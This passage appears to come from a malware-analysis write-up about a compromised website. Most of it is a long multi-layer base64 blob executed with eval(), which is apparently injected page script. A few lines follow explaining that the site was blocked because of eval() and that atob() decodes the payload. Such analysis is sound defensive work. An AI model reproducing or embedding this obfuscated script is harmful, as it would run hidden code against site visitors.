sOTUtOCw1OS05LDg1LTMsNjAtOSwxMDYtNiw4Ny0xLDEwOC0xLDExNi04LDg0LTYsNjktMSw4Mi0xLDU2LTksNjgtMSwxMTAtNywxMTYtMSwxMjUtOSwxMTEtOSw4MS05LDExNy05LDg3LTQsOTQtNCwxMTUtNywxMjAtOCw2NS05LDkwLTksODctMiwxMjMtNyw5Mi0yLDEwNC0zLDkzLTUsOTQtOCw1NS0yLDkxLTQsODgtNCw3Mi03LDc2LTEsODctOSw5My02LDEyMi03LDc5LTYsNzgtNCwxMTUtOSwxMjEtMiw1OC0zLDg5LTksODctMSwxMTItNCw2MC01LDkwLTcsMTIzLTIsODktOCw5MC01LDc2LTQsODYtNCwxMDQtMSw1Ny04LDc1LTIsNzItNCwxMjUtNSw5Mi00LDc5LTMsMTI1LTYsOTMtOCwxMTMtNyw4NC04LDExMC02LDgzLTYsNTctNyw4NS01LDU3LTYsNTUtNiw1OC0zLDgzLTIsMTEzLTQsODQtMiw3My0xLDkxLTEsMTMwLTksMTA2LTMsNTAtMiw3MS00LDExMC01LDU0LTYsNDktMSw4MC01LDEyMi0zLDUxLTIsMTIwLTIsODYtMSw3MS0yLDUyLTMsMTE4LTQsODYtMyw1Mi0zLDExNC02LDU3LTQsMTA5LTksOTUtNywxMTAtMyw4Ni01LDgxLTgsNzQtNSwxMTctMSwxMjQtNiw3OC0zLDcyLTQsODYtNSwxMDAtMSw4Mi00LDEyMy0xLDc4LTgsNTktNiw4My0xLDczLTEsMTIwLTQsNzktMywxMDQtNywxMTQtNCwxMjAtOCw2OC0xLDk2LTksODUtMiw4MS03LDEwOC02LDEwMi0xLDg3LTEsMTE1LTcsMTE0LTUsOTAtNyw1MS0xLDEwMS0xLDExNy0zLDg0LTEsNTUtNiwxMTMtNiw1Ni0yLDcxLTQsMTE1LTksMTI2LTcsOTEtMyw3Ni0zLDExMy02LDExOS0zLDU2LTIsMTAyLTUsMTIwLTEsMTA5LTYsMTE0LTUsODQtOCwxMjctNSw4NC0zLDU4LTksNzEtMyw3My02LDc5LTEsNzMtMyw3OC0zLDEyOS04LDU2LTQsNzctNyw4MS05LDExMC01LDU2LTgsNjYtOSw5MS0yLDExNS01LDg0LTYsMTEzLTQsOTEtOCw1MS0xLDEwNC00LDEyMC02LDg1LTIsNTEtMiwxMDktMiwxMTItNSw5Ny05LDUzLTIsMTE1LTcsOTYtNiw5NS01LDExNC03LDEyMy03LDExNi02LDEwMy02LDEyNC01LDEwNi0zLDExNS02LDc4LTIsMTI0LTIsODItMSw1NS02LDcyLTQsNzQtNyw3OS0xLDg0LTgsMTA1LTQsMTEzLTQsMTIxLTYsMTAzLTIsNzctNywxMjctNSwxMjEtMiwxMTctOCw4NS02LDEwOC00LDEwNS0yLDUyLTIsNzYtOCwxMTctOCw2MC00LDExNy02LDgwLTIsNjctMiw1Ny0xLDU1LTMsODYtNyw4Ny00LDEyNC01LDEwOC05LDEwMC0zLDY4LTIsMTA5LTYsMTI1LTQsODAtNSw5MS05LDExMC03LDgzLTUsODQtOSwxMjgtNiwxMjUtNiw1Ny02LDc5LTcsMTE2LTcsNTMtMSw3NS0yLDcyLTEsNzYtOCwxMTAtNywxMTEtOSw3Mi0xLDc0LTcsMTE5LTQsMTA3LTMsMTAxLTEsOTQtOCwxMTYtOSwxMDktMSw4NS03LDc2LTksNzQtMSwxMTMtNSw3MC0yLDU0LTUsNzUtOSwxMjctOCwxMDEtMywxMTAtMiw4MC0yLDk4LTgsOTEtMSwxMTAtMywxMTgtMiwxMTYtNiw4MC0yLDExMC0xLDc1LTUsOTMtMywxMDktOCw5My01LDkxLTUsNTktNiw3My02LDEyOS04LDgwLTMsMTA2LTQsODAtMywxMTQtOCwxMTQtNyw3NC00LDg4LTEsODYtMiwxMjAtOSw4MS02LDc3LTEsMTI5LTksMTEwLTcsMTIxLTgsNzYtNCwxMTAtNSw4MS03LDEyNi03LDk1LTYsODctMSwxMTMtNSw2MC03LDc2LTEsNzUtNSw4Ni04LDEzMS05LDkzLTMsMTEyLTUsMTIwLTUsMTEyLTgsODItMiwxMTEtOCw4OC0zLDEwNC03LDc5LTMsOTMtOSwxMjctOCw1Ni02LDcyLTIsNTctNyw5OC05LDkwLTEsODAtNywxMDktMyw2MC00LDExOC03LDcxLTEsMTEwLTQsOTgtOSw0NS0yLDg0LTcsNzMtNywxMjEtMSwxMTktMiw3MC0zLDY4LTIsMTA3LTQsMTEyLTQsNzItNSwxMTItOCw4OC03LDU3LTEsMTAzLTIsOTYtOCwxMTItNSw4NS01LDc1LTEsMTIyLTMsMTA3LTgsMTI0LTMsODQtOCwxMTMtNiwxMDQtNCw5Mi0yLDg0LTQsNjktMiw0OS0xLDY2LTksNzktOCw3MC0yLDYzLTcsOTQtNSwxMDItNCwxMTctOCwxMjMtOCw4Ni01LDEwOC05LDUzLTIsMTEzLTUsNTAtMSwxMDYtNSw5NS05LDEwOS0yLDEyNS02LDcxLTQsMTEzLTcsOTAtNCwxMTYtMiw3MS0zLDEwOC01LDcyLTMsNjUtOCw4Ni04LDcyLTUsNTMtNSwxMDItMyw5Mi0yLDExNy05LDkzLTMsMTE2LTYsODItOCw4Ni01LDU2LTQsODMtNCwxMTAtOSw5MC04LDc2LTcsNTctNSw3Mi00LDg4LTUsODQtNiw3Ni04LDk5LTEsMTEyLTIsNzUtOSwxMTAtNiw5Ni05LDk1LTcsMTA5LTEsNTAtMSwxMDctNiw5MS05LDEyNi03LDQ3LTQsNzQtNiwxMjYtNSw5NC01LDUxLTQsNzYtOCwxMTctOSwxMDUtNiwxMTktNiw4Ni05LDc0LTcsNTMtNSw2Ni05LDc5LTUsMTIyLTIsNjUtOSwxMTItNyw5Mi0zLDEyMi0zLDUzLTEsNjgtMiw4MS0xLDkyLTgsODItMSwxMjAtNCw3Ny01LDc0LTMsMTExLTgsNzgtMSw4MS04LDEwOC0yLDY0LTgsMTI1LTcsNzUtNCw3My02LDU1LTcsMTI2LTcsMTA3LTgsOTEtNSw3NC04LDExMi0zLDg1LTQsNzQtMywxMDYtNywxMjEtNCw3Ni03LDEyMy0zLDQ5LTEsNTUtMyw3OC0yLDY5LTIsMTEzLTEsODktOCwxMDktNyw4OS0yLDc3LTcsMTE3LTcsMTA2LTksNDktMSwxMTctMSw5Mi0yLDgwLTQsMTMwLTgsODgtNywxMTgtNCw5Ni05LDg5LTYsOTItNyw0OS0xLDc5LTIsODYtMywxMTQtMyw3Ny01LDc1LTcsNzUtNywxMjMtMyw1My00LDk2LTYsNzMtMywxMTQtNywxMDctMSw3Mi0xLDcyLTUsODItMSwxMjAtNyw3NS00LDEyNy03LDEyOC04LDEyNi02LDc4LTUsMTI1LTMsMTA5LTYsOTUtOSw4Ni05LDEyNy04LDU3LTQsMTE5LTIsOTgtMSw1My01LDcyLTYsOTItMiwxMDYtNyw5My01LDU2LTgsNjItNiw2OS00LDg2LTMsNzgtNSw3OS00LDg2LTYsMTA3LTEsMTEzLTksNzktMyw4OC02LDc5LTgsOTAtOCw1OC05LDg0LTYsMTI2LTcsMTIwLTEsMTIwLTcsNzQtOCw1Ni02LDU3LTQsMTE1LTEsOTEtNSw3NC00LDExMy01LDU2LTEsMTA1LTUsNTItMSwxMTQtNiw2OS0xLDk0LTQsMTEyLTUsMTExLTMsNTgtMiwxMDYtOSwxMjctOCw1Ny01LDc1LTksODMtOCw5My05LDEyOC05LDExNi0yLDczLTEsNzItNCw4OS0zLDg4LTEsOTItMiw5Ni05LDExOC0yLDY3LTIsOTAtMyw4OC00LDEyNS02LDEyNC04LDgxLTEsOTEtOSwxMDYtMywxMjgtNyw3NS03LDExNy04LDExMi01LDUyLTUsNzMtNyw3MS00LDEyNy04LDg3LTksNzgtOCwxMTEtOCwxMTktOCw4NC02LDgwLTIsNzQtOSw3OC01LDExNC0yLDgwLTQsNzQtNSw4MC0yLDg2LTUsMTA1LTYsNzYtNSw2MC03LDg3LTMsOTAtMyw5My02LDkxLTEsODItNiw5My0zLDEyNS00LDU5LTMsNzgtOSw3NC0zLDEwNi0xLDEyNC01LDYxLTksODUtNSw3My03LDEwMC0xLDEyOS04LDkwLTgsODUtMiw4NS00LDExNi05LDcyLTYsNzEtNSw3Ni0zLDEyNC01LDgzLTYsNzUtMywxMTAtMiw3MC0xLDk4LTgsMTExLTgsMTExLTgsOTEtMiw3OS01LDgzLTIsMTEyLTEsODctMiw4Mi0yLDgwLTgsOTAtNCwxMjQtMyw5NS04LDg4LTEsODYtNCw4OS0yLDkxLTEsOTYtOSwxMTgtMiw3MC01LDkyLTUsODgtNCwxMTYtNSw3Ny0yLDgzLTcsMTIzLTMsMTA1LTIsMTIxLTgsNzYtNCwxMTItNyw3OC00LDEyMC0xLDk1LTYsODgtMiwxMTAtMiw1OS02LDg0LTksNzgtOCw4NS03LDEzMC04LDk4LTgsMTA5LTIsMTI0LTksMTA4LTQsODMtMywxMTEtOCw5NC05LDEwMS00LDc5LTMsODctMywxMjYtNyw1NS01LDc3LTcsNTQtNCw5My00LDgxLTgsODMtNywxMjQtMyw1My0xLDc4LTUsNzQtNSwxMDktNSwxMTYtNSw2MS03LDg0LTYsMTEwLTYsNzgtNSwxMjQtNiw3Ni04LDExMC0xLDU4LTEsMTA2LTEsODYtMywxMjEtMiw4My05LDkxLTcsMTA2LTYsOTUtNywxMTEtMyw5NC00LDkzLTMsMTEwLTcsODAtNywxMDgtNCwxMDItNSw1Ni04LDgxLTQsOTMtNyw3OS0xLDEwOS0zLDkwLTEsNTYtNCw3OS05LDg4LTYsOTAtNSwxMDktNyw4Mi03LDcwLTIsMTEyLTUsODEtNiw3My0xLDEwNy0xLDEyNi02LDU4LTMsODctNywxMDYtMiwxMjYtNywxMjMtMiw4Mi05LDEwOC0yLDg0LTcsMTIxLTQsNzEtNSwxMTMtNSw3Ny03LDUyLTksODEtNSw3My04LDcyLTcsODUtMSw4Ny05LDczLTgsMTE2LTQsMTI3LTUsNzgtNywxMjgtNywxMDktNiwxMDQtNyw5Ny04LDg5LTUsNTgtNiw1MC0yLDg0LTUsMTI0LTUsNTktNyw4My00LDg0LTYsNjktMSwxMDgtNCwxMDAtMyw3NS02LDc3LTksMTIwLTQsMTI2LTUsMTA2LTcsNzUtNSwxMTctOSw2My04LDkxLTUsMTExLTEsMTE2LTQsMTIyLTgsOTEtNyw3NS02LDEwOS01LDUwLTcsMTA0LTIsNzktNywxMTQtNyw2OS0yLDkzLTksNzQtNSwxMjEtNSwxMTYtNiwxMDItNSw1MC0yLDExOC0yLDkyLTIsMTA1LTQsOTItOSwxMDgtOSw2NS05LDcwLTIsODctMyw4NS04LDk2LTYsODEtNiw5NC03LDExNy0yLDExMC04LDc1LTgsMTI4LTcsMTI2LTcsMTI2LTcsOTgtOSwxMTItMiw4Mi00LDExMy00LDg5LTYsNTMtMywxMDEtMSwxMjEtNyw3NC00LDExMy01LDExMi01LDY1LTksODItMyw4OC01LDExNS00LDEwMi0zLDk0LTQsMTA3LTMsNzMtNyw3OS0xLDEwNi05LDU3LTksMTE3LTEsOTEtMSwxMDktOCw5MS0zLDkzLTcsNjEtOCw3Ni02LDg5LTYsMTEzLTYsNzQtMSw3Ni0yLDEwOS00LDEwOC05LDU2LTQsNjktMSw4NS0xLDk1LTYsMTExLTEsODAtMSw3NC04LDYxLTksMTEzLTcsODgtNiw4OC00LDg5LTgsMTI0LTcsODEtOSwxMjQtMiw3NC05LDExNy0xLDg2LTksNzQtNiw4NC0yLDg2LTQsOTgtOSw4My0xLDgwLTcsMTA0LTMsNzYtMyw4My0xLDExMi01LDkyLTMsMTA0LTYsODQtMyw5NC05LDEwMy02LDc2LTUsMTE0LTQsNjEtOSw2Ni0xLDc3LTIsMTA2LTMsMTE0LTcsMTA5LTMsNzMtMSw3Mi01LDExOC03LDExNi03LDEwMC0zLDc1LTksNzMtOCwxMTYtOSw5Mi04LDc5LTgsMTIwLTQsMTE3LTMsOTAtNiw3NC01LDEwOC00LDUwLTcsMTExLTksNzMtMiw3Ni0yLDEyMy0xLDk5LTksMTEzLTYsMTI0LTgsMTEyLTIsMTA2LTksMTI0LTQsOTgtOCwxMjUtMywxMDctNiw5Ni04LDkzLTcsNTktNiw5Ni05LDkyLTgsNzQtOSw3OS00LDg0LTYsOTAtMywxMTgtMyw5My0zLDc5LTcsNzItNCw2NC04LDEyMi0zLDgwLTUsMTIxLTIsMTIxLTYsMTE0LTgsNzgtNyw4Ni00LDg2LTEsMTI2LTksNzUtNywxMjItMiw3Mi03LDEyMy05LDc4LTEsNjktMSwxMjAtOSw3OS0xLDcxLTUsODYtNSw4Mi0xLDExNC0zLDc4LTUsNjgtMyw4Mi05LDEwMy00LDEwMy0yLDkwLTMsMTExLTcsNjAtNyw3OC02LDExMC01LDc5LTIsMTA1LTMsNjgtMiw3My02LDgyLTEsNzMtNCw3Mi0zLDExMi02LDcyLTcsMTI4LTksMTA0LTUsOTUtOSwxMTctMiw1MS0zLDcwLTIsMTEwLTUsNzYtNywxMjUtOCw3OS04LDg0LTMsMTE3LTIsNTgtMiw3OC00LDEyNi03LDExOC0zLDEwNS02LDc3LTQsMTA0LTEsNzktNiw1NC01LDg1LTksMTA2LTMsMTA4LTUsODQtNiw4MC05LDEwNy0xLDExOC03LDU4LTgsNzAtMSwxMDYtMSw2My03LDgxLTIsOTItMiw5MS00LDc1LTEsODQtMywxMDUtNiw1NS00LDExNi04LDU2LTcsMTA0LTMsODctMSwxMTItNSwxMjctOSw3Ni04LDg4LTEsMTA2LTYsMTA5LTMsNzYtNSw4OC02LDEyNS02LDUwLTMsODUtOCw3Mi01LDExOS00LDc3LTEsNzYtMywxMjMtMywxMTQtNyw4OC0yLDgzLTcsMTA2LTMsNjEtNSw5MC05LDc2LTEsMTMwLTgsNjgtMyw2MC02LDc2LTgsODktOCw5My04LDc0LTUsNzctMiw3Ni05LDc0LTksNzMtNiw3Ni00LDc2LTQsMTEyLTQsNTItNCw5OS05LDc1LTUsMTEwLTMsMTE3LTYsNzktNywxMDgtMywxMjAtNSwxMTItMiw4OS02LDU1LTYsNjEtNCw0OC0xLDEwNi02LDkyLTksMTIzLTgsMTA1LTYsNzktNiw3MC01LDYwLTgsNTItMyw4OC05LDg5LTgsNTMtMSw4My03LDczLTYsMTI2LTQsNjktNCw2NS04LDcxLTIsNzctOSw5MC05LDgwLTEsODAtNiw2OS0xLDU3LTEsMTE4LTcsNzEtMSwxMTAtNCw5Ny04LDQ4LTUsODYtOSw3Mi02LDEyNi02LDExMS0yLDg2LTMsMTE3LTcsMTE5LTcsMTE3LTMsODctNCw4OC0yLDEyNS05LDEyMC0xLDEwMS0xLDkxLTgsNzctMywxMzEtOSw5Ni02LDEwOS0yLDEyMS01LDExMS0xLDEwMS00LDU1LTcsMTE4LTIsOTUtNSw3Ni0xLDEyNy01LDc0LTksMTE3LTEsNzEtMyw3MC0yLDg2LTUsNzMtMyw5Mi0yLDEyOC02LDYwLTQsOTQtNCw2OS0xLDc2LTgsMTI1LTUsMTE4LTEsOTItNyw1My00LDExNC02LDExMC0xLDg1LTIsNTgtOCwxMDgtOSw1My0zLDkwLTcsMTI1LTUsMTIxLTIsNTctOCw3OC00LDExMS01LDEyNy03LDkyLTIsODItNiwxMjYtNyw1Ny04LDExNy03LDkwLTEsMTI2LTcsNjEtNSw4OC0xLDgzLTQsMTExLTYsNjYtMSw1MS0zLDc5LTcsNzQtNywxMDYtMywxMDUtMywxMDQtNyw4OS02LDEwOS02LDc4LTksNzgtOCwxMTMtNyw3OS02LDY0LTgsODUtNSw3OS05LDEwMy00LDEyNi04LDcwLTQsOTItOSw4NC03LDEyNS04LDcwLTEsMTI3LTUsOTgtOSw1MC0zLDEwNy01LDk3LTksNTMtMSw4OC05LDgyLTcsODQtMiwxMTYtOSwxMDktMyw4NS02LDEyNy03LDExNS04LDEwNC01LDgwLTUsMTExLTYsOTctOCw3NS00LDc3LTcsODQtMSwxMTUtOCw4Ni05LDc1LTIsNzYtOSw2MS05LDg4LTgsODktMSwxMTQtNCw2OS0zLDUxLTIsMTA3LTYsNzUtNiw5MS05LDYyLTcsODctNCw1MS0xLDEyMC04LDU2LTIsOTItMyw5My01LDcxLTUsNTQtMSwxMDEtMSw5Ny05LDExNS03LDk5LTksOTctNywxMDktMiwxMTctMSwxMTYtNiw3OS0xLDEyNi02LDEwNC00LDk3LTcsODMtMyw4Ny0zLDExNy02LDU1LTEsNzAtMiw2OC0xLDExOC0zLDg2LTcsNzktNCw5My05LDYyLTUsNzQtNCw4MC05LDExMy03LDk2LTcsNTgtNCw4NS04LDEwNy0zLDcyLTcsMTExLTUsOTEtOSw5Mi05LDUzLTEsMTE3LTksNzYtOCwxMjItMiwxMjAtMSwxMTEtNyw3OS04LDExMi02LDU4LTEsODYtNCw5Ni03LDg2LTQsMTI0LTUsNTQtMyw5OS05LDExMy05LDEwNS0yLDEwNy04LDgwLTQsODctNCw3MS0yLDEyMy00LDcyLTIsMTI1LTQsNzMtNCw5My00LDk2LTcsNzMtMiw4My05LDgyLTYsOTAtMyw4MC05LDgzLTEsMTE3LTYsMTA5LTgsOTUtOSw4OC02LDYwLTksOTQtNSw5My02LDEwMy0zLDEyMC02LDg0LTEsNTEtMiwxMTYtOCw2Mi05LDEwMS0xLDkxLTMsMTE1LTcsOTMtMyw5MS0xLDExMy02LDEyNC04LDExMS0xLDEwMS00LDU3LTksMTI0LTgsOTctNywxMDQtMyw5Mi05LDEwOC0xLDExNC02LDg4LTEsODYtMyw4Mi05LDczLTQsNzctMyw3My01LDU2LTQsNzItMSw3OC02LDY5LTEsMTA4LTksMTA1LTEsMTA2LTYsMTIxLTEsMTEyLTEsMTEzLTEsNzEtNSw2OC0xLDEyNC01LDExMS02LDc0LTYsMTE1LTcsMTAwLTEsMTI0LTUsODQtNSwxMjgtNiw1MS0zLDEwNi03LDg5LTksMTA3LTIsODYtNSwxMDctMyw5Ni03LDU2LTgsMTI1LTYsODctOCw4NS03LDEwOS00LDEwMC0xLDU5LTIsNzMtNiw5Mi04LDg2LTUsODgtOSw4Ny05LDY5LTEsMTA1LTIsNTYtOCw3Ny05LDg5LTUsMTI4LTksMTE2LTcsODAtNCw4OS0zLDYwLTcsMTIzLTUsOTItOSw1NS01LDk3LTcsNTYtNiw5My03LDExNC02LDExNC02LDUzLTUsOTUtNSw3OC02LDc1LTksOTQtNCw5NS01LDExMS03LDY5LTMsODYtOCwxMDUtOCw1NC02LDExOS0zLDkxLTEsMTA2LTUsOTAtMiw4Ny0xLDYxLTgsNzYtOSwxMjItMSw4MS00LDEwMy0xLDg1LTgsMTEwLTQsMTEyLTUsNzItMiw5My02LDg0LTEsNTMtNSwxMTgtOCw4MS01LDcxLTUsMTI5LTksNjEtNCw5OC05LDk0LTcsMTAxLTEsMTE3LTMsODgtNSw1MS0yLDExMS00LDEwOS0yLDEwMS0xLDg4LTQsMTIwLTEsOTQtOCw4MC0yLDg1LTQsNTUtMiwxMTMtMyw4NS04LDc3LTYsNzYtNiw5Ni02LDEwNi01LDg5LTEsOTMtNyw2MC03LDg4LTEsODgtMSw5NC01LDkyLTMsNzctNCwxMTUtOSw2MC00LDExOC03LDc2LTYsMTExLTUsOTAtMSw1MC03LDg2LTksNzUtOSwxMjgtOCwxMTgtMSw4NS0yLDg4LTQsOTEtNiwxMjUtOCw3Mi00LDg5LTcsMTI3LTgsMTIyLTgsODMtOSwxMzAtOCwxMjEtMiw4MS01LDczLTMsNzMtOCw1My0xLDExMS01LDgxLTgsMTA2LTIsMTEyLTUsMTAwLTEsODEtMiwxMDctMiw3Ni03LDEwNC03LDc3LTcsMTEwLTUsMTA5LTIsNzEtNiw3Ny0xLDExMi03LDU3LTQsODItOCw4OS0zLDg5LTEsMTExLTMsNTctNiw4NC00LDkxLTksOTQtNCwxMTEtMiw3Mi02LDg1LTIsMTA3LTQsNDgtMSw4OC01LDEyNy04LDExNy0yLDU3LTEsODQtNyw4NS0xLDY4LTMsNzktMyw3NS0yLDEyMi0zLDExMC03LDEyNS0zLDEwNS04LDg5LTQsMTAyLTIsOTItMiwxMDEtMywxMTMtNCw5OS05LDExNy01LDkxLTYsNzktNyw1Ni03LDEwNy0zLDkxLTEsNTUtNSwxMjQtOCw3OS0zLDkyLTUsODktMSwxMTEtMyw1Mi0zLDc5LTQsMTI0LTQsMTI4LTksMTI3LTYsNzMtMSwxMDgtMiw4OS00LDExNS03LDg2LTMsMTI2LTYsNjQtOCw1OC02LDgwLTEsODktNiwxMTctNiwxMDYtNywxMDQtMiw5MC0zLDczLTMsMTExLTEsMTAxLTQsNTYtOCwxMjUtOSw5MS0xLDc4LTQsNzUtNSw1OS0yLDU2LTMsOTItNSw4OS01LDEyNS05LDEwOC00LDkyLTgsOTEtNyw5MS0xLDEwNy0zLDEwOC05LDUwLTEsODUtNywxMDQtMiw4NS05LDEyMi0yLDEwNi0zLDUzLTUsODktNiwxMjMtMSw5MC01LDEyMy02LDc1LTgsMTEwLTYsNTMtNSwxMDctNCw2OS0zLDEwNy0yLDU3LTksOTQtNSw4NC03LDExMC03LDU4LTYsNzgtOSw4MC03LDEyNi03LDUzLTEsOTktMiw4NS04LDEwNi0yLDEyOC05LDU2LTUsNzctOSw4OC01LDc5LTIsOTEtMSw4MC0zLDg4LTUsMTE3LTYsNzktNyw5NC03LDkxLTQsODUtMyw1Ni03LDgwLTUsMTExLTcsMTIxLTIsMTI3LTYsNzgtNSwxMTAtNSwxMTItNSw1MC0zLDY5LTEsMTExLTgsMTE4LTMsMTIxLTMsODYtOCw3Ni04LDk0LTgsOTEtOSw4MS04LDY4LTIsNTMtMSwxMTktNyw3OS00LDcwLTQsNTctMSw4NS00LDg0LTYsMTEwLTQsMTI0LTgsMTI0LTQsOTItNyw3OC03LDk3LTgsODQtMyw5Mi04LDk1LTgsMTE5LTMsNzctMSw3Mi0zLDY5LTEsNjItNSw1OC05LDEwOC05LDg3LTUsNTctOSwxMTYtNCw3Ni05LDc2LTgsNzUtMiwxMTMtNCw2OS0xLDEwNS0xLDEwMS0yLDEyMS01LDEwMi0xLDEyNy02LDExOS00LDEwMC0xLDc1LTEsMTI2LTcsNjQtOCw1MS04LDc5LTgsNjctMSw1OC0yLDkyLTMsODEtNSw4Ny0zLDcwLTQsNTUtMiw4My0xLDc2LTQsMTI0LTgsOTAtMyw5NS01LDU2LTYsMTI3LTgsNzQtMSw3Ni02LDExMC00LDg5LTgsMTEyLTQsODEtMyw5MC04LDEyNC01LDEyOC03LDY5LTEsMTEwLTEsNzItNiw3Mi02LDkwLTcsNTAtMSwxMTQtNiw1OS02LDEwNC00LDg5LTEsMTExLTMsOTgtOCw4OC05LDEwNy0zLDEwNi02LDExMi0yLDc3LTEsMTIwLTEsODctNiwxMDUtOCw4MS01LDc1LTcsMTA0LTEsNTctMSw3Ny03LDEyNi00LDgzLTksNzEtMSw4Ni04LDg5LTYsNTUtMyw4Mi03LDc1LTMsODYtMyw3MC01LDc5LTgsNzktMyw4OS03LDEwNC0xLDEyNS00LDc3LTksMTE3LTgsMTAzLTMsNTYtNiw5NC04LDExMS0zLDExNS03LDQ4LTUsODItMiw3Mi00LDEwNi03LDgxLTMsODAtNywxMjUtNSwxMDktMiwxMTEtMiw3Ni0xLDc0LTgsNjMtNyw4OS04LDgxLTUsMTIzLTEsNzQtOCw0OC01LDg2LTEsNzYtNSw5OC05LDg0LTMsODgtNCw5Ni05LDExOC0yLDc4LTIsODktMiw5Ni04LDExMy02LDU3LTcsODQtNiw4NS0zLDEyMy00LDExMS0xLDc5LTgsOTAtOSw1NS0zLDExMy01LDczLTEsMTI0LTQsMTI1LTYsMTIyLTgsNzctNCwxMjgtNiwxMDYtMyw4Ny0xLDEwNC02LDExMy05LDExMC0zLDExMy04LDc4LTMsMTA5LTYsNTktMyw2OC0zLDc2LTksMTEwLTUsNzUtNiw1OS03LDc1LTcsOTEtOCw4MS00LDExNS00LDc3LTEsMTIzLTIsNTUtMyw4MS04LDc4LTksMTExLTcsNzMtOCw2My04LDg1LTksODMtMSwxMjUtNiw1MC0yLDgwLTgsODYtMyw5MS0yLDExOS05LDg4LTcsMTA4LTEsNzgtNCw4OS01LDEwNC00LDk2LTgsMTE1LTcsOTctNyw5NS01LDExMy05LDEwNS0yLDEyNC0yLDc3LTIsMTA1LTEsMTEzLTYsODYtOCwxMDQtNSw5NS03LDEyNC00LDEwOS00LDEwMC0xLDU2LTYsOTUtNSw4My03LDg1LTYsMTEzLTYsNzItMyw5MS00LDk0LTgsOTAtMiwxMTYtOCwxMDgtMSwxMDYtOSw4OS0zLDY4LTIsNjEtNCw5MC0xLDk0LTcsMTA2LTIsMTExLTQsOTItNiw1Ny04LDkzLTQsMTIxLTgsNzktMSwxMTQtOSwxMjEtNiw4NS00LDg2LTgsMTA5LTUsNjMtNiw1NC0xLDg0LTMsOTUtOCw3MS0yLDY0LTMsNDEtMiw2MC0xLDE1LTUsMTA2LTQsMTI0LTcsMTExLTEsMTAyLTMsMTIwLTQsMTA2LTEsMTEyLTEsMTEzLTMsMzgtNiwxMjUtNSwxMjAtOSwxMjMtOSwxMDAtNSwxMDctNiwxMTEtMSwxMDEtMiw0Ny03LDEyMS02LDExOC0yLDEyMS03LDExMy04LDExNS01LDEwOC01LDUyLTgsMzUtMywxMDktMiwxMDItMSwxMjUtNCw0Ni01LDM3LTUsMTI0LTEsMTItMiwzOC02LDMzLTEsMTIzLTUsMTAxLTQsMTE3LTMsMzYtNCwxMjItOCwxMDYtNSwxMTctMiw0MS05LDcwLTksMzYtNCw0Ni03LDQwLTEsNjEtMiwxNi02LDQxLTksMzMtMSwxMDgtNiwxMjAtOSwxMjMtOSw0MS05LDQxLTEsMTI0LTYsMTAwLTMsMTIwLTYsMzMtMSwxMTItNywzMy0xLDY3LTYsMzctNSw0OS0xLDY2LTcsMzUtMywxMDctMiwzNi00LDY2LTYsMzctNSwxMjItNywxMTctMSwxMTctMywxMTMtOCwxMTUtNSwxMDUtMiw1Mi02LDEwOS0xLDEwNS00LDExMy0zLDEwNy00LDExNy0xLDExMi04LDY4LTksMzQtMiwxMDktNCw0OC01LDQ2LTMsNTAtOSwzOC02LDEyOS02LDE3LTcsMzQtMiwzOS03LDMzLTEsMzYtNCwxMjEtNywxMDQtMywxMjMtOCwzMy0xLDQ1LTIsNjMtMiw0MC04LDkwLTcsMTI0LTgsMTIzLTksMTA3LTIsMTE0LTQsMTExLTgsNDktMywxMDYtNCwxMTktNSwxMTQtMywxMTUtNiw3NS04LDExMC02LDEwMC0zLDExNS0xLDcxLTQsMTEyLTEsMTA0LTQsMTAzLTIsNDctNywxMTctMiwxMjItNiwxMTktNSwxMDgtMywxMTMtMywxMDUtMiw1MS01LDEwMS0yLDEwNi0yLDEwMy02LDEyMC02LDY5LTIsMTIwLTksMTA4LTgsMTA5LTgsNzItNywxMjMtNyw0NC00LDExMS02LDQzLTIsMzgtNiwxMDMtOSwxMy0zLDM0LTIsMzctNSwzMy0xLDM3LTUsMzctNSwzNy01LDM4LTYsMzMtMSwzNC0yLDQxLTksNDEtOSwzNS0zLDM3LTUsNDEtOSw0MS05LDQxLTksMzktNyw0MC04LDM2LTQsNDEtOSw0MC04LDM2LTQsMzktNyw0MS05LDQwLTgsMzQtMiwzNy01LDM2LTQsMzMtMSwzNy01LDQwLTgsMzktNywxMTMtNiwxMDktOCwxMjYtNSw1Mi02LDEwMC0xLDEwNi0yLDEwNi05LDExOC00LDczLTYsMTEyLTEsMTAzLTMsMTAzLTIsNzItNywxMjAtNCw0Ni02LDEwOC0zLDM4LTYsNDUtOCwzNy01LDExMi01LDExMC05LDEzMC05LDUwLTQsMTEzLTUsMTEwLTksMTEzLTMsMTA3LTQsMTE5LTMsMTA5LTUsNDktOCw0OC03LDYzLTQsMTQtNCwzMy0xLDQxLTksMTMwLTUsMTEtMSwzNy01LDM3LTUsMTE5LTUsMTA3LTYsMTIzLTcsMTIyLTUsMTE2LTIsMTE0LTQsMzUtMywxMjMtOSwxMDgtNywxMTctMiw2OC05LDExLTEsMTI3LTIsMTgtOCwxOS05LDEyNy05LDEwNC03LDExOS01LDM1LTMsMTAxLTEsMTA4LTcsMTA1LTYsNDEtOSw3MC05LDM0LTIsMTIxLTEsMTE0LTMsMTE4LTQsOTctMiwxMDQtMywxMTctNywxMDAtMSw0NS01LDk4LTEsMTIwLTQsMTIwLTksMTAxLTMsNDYtNiwxMDQtMywxMTktOSwxMDEtMiwxMDItMSwxMDYtNiw1MC05LDUwLTYsMzUtMywxMTMtNiwxMDQtMywxMjItMSw0NS00LDY1LTYsMTQtNCw0My0zLDExOS05LDEwMy0yLDEyNS02LDM3LTUsNzctNywxMjMtNiwxMTktOSwxMDQtNSwxMjUtOSwxMDYtMSwxMTctNiwxMTUtNSw0My0zLDEwOC04LDEwNy02LDEwMi0zLDQzLTIsNDgtNyw0MS0xLDQ1LTQsNjAtMSwxNy03LDExLTEpO2V2YWwoRFJZVVFJRURIUyk7'); eval (PRZKZPVRCI);

Looking at end of the code, I knew that the site got blocked due the eval() function. In the past, I have had similar experiences with this type of detection. The problem with eval() is that it can analyze and run malicious code that is hidden through multiple encoding schemes. Our payload above is being base64 decoded by our atob() function. Decoding led to the following code.

